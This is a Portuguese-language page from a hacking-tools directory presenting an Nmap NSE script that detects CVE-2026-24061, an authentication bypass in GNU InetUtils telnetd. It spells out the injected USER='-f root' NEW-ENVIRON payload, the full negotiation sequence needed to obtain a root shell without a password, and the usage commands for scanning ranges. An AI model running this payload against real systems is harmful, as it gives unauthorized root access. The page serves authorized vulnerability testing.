Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-24061-NSE — O script realiza uma negociação Telnet completa, espelhando a sequência exata de bytes de uma sessão real do cliente telnet -a. | Kitploit
Ferramentas/GitHubGitHub/hd0x01/cve-2026-24061-nse
Scanners de VulnerabilidadesExploraçãoSegurança de RedeTestes de PenetraçãoAutenticação
GitHubhd0x01/cve-2026-24061-nse

CVE-2026-24061-NSE

O script realiza uma negociação Telnet completa, espelhando a sequência exata de bytes de uma sessão real do cliente telnet -a.

Ver Repositório
7há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-24061 — Bypass de Autenticação no telnetd do GNU InetUtils

Script de Detecção NSE para Nmap

Nmap NSE CVE CVSSv3 License


Visão Geral

Este script NSE do Nmap detecta a CVE-2026-24061, uma vulnerabilidade de bypass de autenticação nas versões 1.9.3 a 2.7 do telnetd do GNU InetUtils.

Ao enviar uma variável de ambiente USER maliciosa no formato durante a negociação de opções do Telnet, um atacante não autenticado pode obter um shell com os privilégios do usuário local especificado — incluindo — .

-f <nome_de_usuário>
root
sem fornecer nenhuma senha

Uso Pretendido: Apenas para testes de penetração autorizados e avaliação de vulnerabilidades.
Executar este script contra sistemas sem permissão escrita explícita é ilegal.


Detalhes da Vulnerabilidade

CampoValor
ID CVECVE-2026-24061
AfetadosGNU InetUtils telnetd 1.9.3 – 2.7
Pontuação CVSSv39.8 Crítico
VetorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
TipoBypass de Autenticação (CWE-287)
Divulgação2026-01-01

Como funciona

O telnetd do GNU InetUtils usa a opção Telnet NEW-ENVIRON (RFC 1572) para receber variáveis de ambiente do cliente durante a fase de negociação. O programa login(1) é então invocado com essas variáveis.

A vulnerabilidade surge porque o telnetd passa a variável USER diretamente para o login sem sanitizá-la. O programa login no Linux aceita um sinalizador -f <usuário> que significa "pré-autenticado, não verificar senha". Ao injetar USER="-f root" via payload NEW-ENVIRON, o atacante contorna a autenticação completamente.

root@kitploit:~
Cliente → Servidor:  IAC SB NEW-ENVIRON IS  VAR "USER"  VALUE "-f root"  IAC SE
Resposta do servidor:  inicia login -f root  →  shell root, sem exigir senha

Detalhes do Script

CampoValor
Nome do arquivotelnet-vuln-cve-2026-24061.nse
Categoriasvuln, exploit, intrusive
PortaTCP/23 (telnet)
Testado emNmap 7.94 / 7.98, Windows e Linux

Método de Detecção

O script realiza uma negociação Telnet completa, espelhando a sequência exata de bytes de uma sessão real de cliente telnet -a (reconstruída a partir de captura Wireshark):

  1. Recebe a rajada IAC de abertura do servidor (DO TTYPE, DO TSPEED, DO ENVIRON, …)
  2. Responde com o anúncio completo de capacidades do cliente (WILL TTYPE, WILL LINEMODE, …)
  3. Conclui a rodada de sub-negociação (SB TSPEED, SB ENVIRON, SB TTYPE)
  4. Injeta o USER='-f <usuário>' malicioso no payload NEW-ENVIRON IS
  5. Conclui a sequência WILL ECHO / DO BINARY / WONT LINEMODE
    (crítico — sem isso, o telnetd não consegue finalizar a configuração do PTY)
  6. Verifica se o servidor envia um prompt de shell de login sem desafio de senha

Estados de resultado:

EstadoSignificado
EXPLOITPrompt de shell recebido — bypass confirmado
LIKELY_VULNPayload ENV aceito, sem prompt de senha, mas sem prompt de shell
NOT_VULNPrompt de senha visto, ou negociação não foi concluída

Instalação

Linux

root@kitploit:~
# Copiar para o diretório de scripts do Nmap
sudo cp telnet-vuln-cve-2026-24061.nse /usr/share/nmap/scripts/

# Atualizar o banco de dados de scripts
sudo nmap --script-updatedb

Windows

root@kitploit:~
# Copiar para o diretório de scripts do Nmap (ajuste o caminho se necessário)
copy telnet-vuln-cve-2026-24061.nse "C:\Program Files (x86)\Nmap\scripts\"

# Atualizar o banco de dados de scripts (executar como Administrador)
nmap --script-updatedb

Uso

Varredura básica (usuário padrão: root)

root@kitploit:~
nmap -p 23 --script telnet-vuln-cve-2026-24061 <alvo>

Especificar um usuário diferente

root@kitploit:~
# Forma curta
nmap -p 23 --script telnet-vuln-cve-2026-24061 --script-args user=kali <alvo>

# Forma média
nmap -p 23 --script telnet-vuln-cve-2026-24061 --script-args telnet-user=kali <alvo>

# Totalmente qualificada
nmap -p 23 --script telnet-vuln-cve-2026-24061 \
    --script-args telnet-vuln-cve-2026-24061.user=kali <alvo>

Varrer uma faixa de IPs

root@kitploit:~
nmap -p 23 --script telnet-vuln-cve-2026-24061 192.168.1.0/24

Saída Verbosa / Depuração

root@kitploit:~
nmap -p 23 --script telnet-vuln-cve-2026-24061 -v  <alvo>   # verboso
nmap -p 23 --script telnet-vuln-cve-2026-24061 -d  <alvo>   # depuração
nmap -p 23 --script telnet-vuln-cve-2026-24061 -d2 <alvo>   # rastreamento hex completo

Exemplo de Saída

Host vulnerável

root@kitploit:~
PORT   STATE SERVICE
23/tcp open  telnet
| telnet-vuln-cve-2026-24061:
|   VULNERABLE:
|   Bypass de Autenticação no telnetd do GNU InetUtils
|     Estado: VULNERABLE (Explorável)
|     IDs:  CVE:CVE-2026-24061
|     Fator de risco: Crítico  CVSSv3: 9.8
|     Descrição:
|       O serviço telnetd no GNU InetUtils (1.9.3 - 2.7) permite
|       bypass de autenticação via variável de ambiente USER maliciosa.
|       Enviar '-f <usuário>' resulta em um shell de login não autenticado.
|     Informações adicionais:
|       Bypass de autenticação: prompt de shell recebido após injetar
|       USER='-f root' -- nenhum desafio de senha foi apresentado.
|     Referências:
|       https://nvd.nist.gov/vuln/detail/CVE-2026-24061
|       https://github.com/JayGLXR/CVE-2026-24061-POC
|_      https://github.com/SafeBreach-Labs/CVE-2026-24061

Host não vulnerável

root@kitploit:~
PORT   STATE SERVICE
23/tcp open  telnet

(sem saída do script — NOT_VULN é silencioso por design, convenção padrão do Nmap)


Argumentos do Script

ArgumentoAlias(es)PadrãoDescrição
telnet-vuln-cve-2026-24061.usertelnet-user, userrootNome de usuário a injetar via -f

Notas Técnicas

Por que WONT LINEMODE é crítico

O telnetd do GNU InetUtils usa a negociação Linemode (RFC 1184) para determinar o modo de E/S do terminal. O servidor envia DO LINEMODE no início da negociação, e o cliente inicialmente responde WILL LINEMODE. Após a troca do payload ENV, o servidor envia WILL ECHO seguido de DO BINARY. Neste ponto, o cliente deve responder com WONT LINEMODE para sinalizar o modo caractere-a-caractere — somente então o telnetd pode concluir a configuração do PTY (ioctl TIOCSWINSZ) e iniciar o login. Sem esta etapa, o servidor registra peer died: Inappropriate ioctl for device e encerra a conexão.

API de Socket NSE

A API de socket NSE do Nmap difere das convenções padrão de socket Lua:

root@kitploit:~
-- Nmap NSE (correto):
local status, data = sock:receive_bytes(1)
if status == true then -- data é a string recebida

Referências

  • NVD — CVE-2026-24061
  • PoC por JayGLXR
  • PoC por SafeBreach-Labs
  • RFC 1572 — NEW-ENVIRON
  • RFC 1184 — Linemode
  • Documentação NSE do Nmap

Aviso Legal

Este script é fornecido apenas para testes de segurança autorizados e fins de pesquisa. O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta. Sempre obtenha permissão escrita explícita antes de testar sistemas que você não possui.

Baixar ferramenta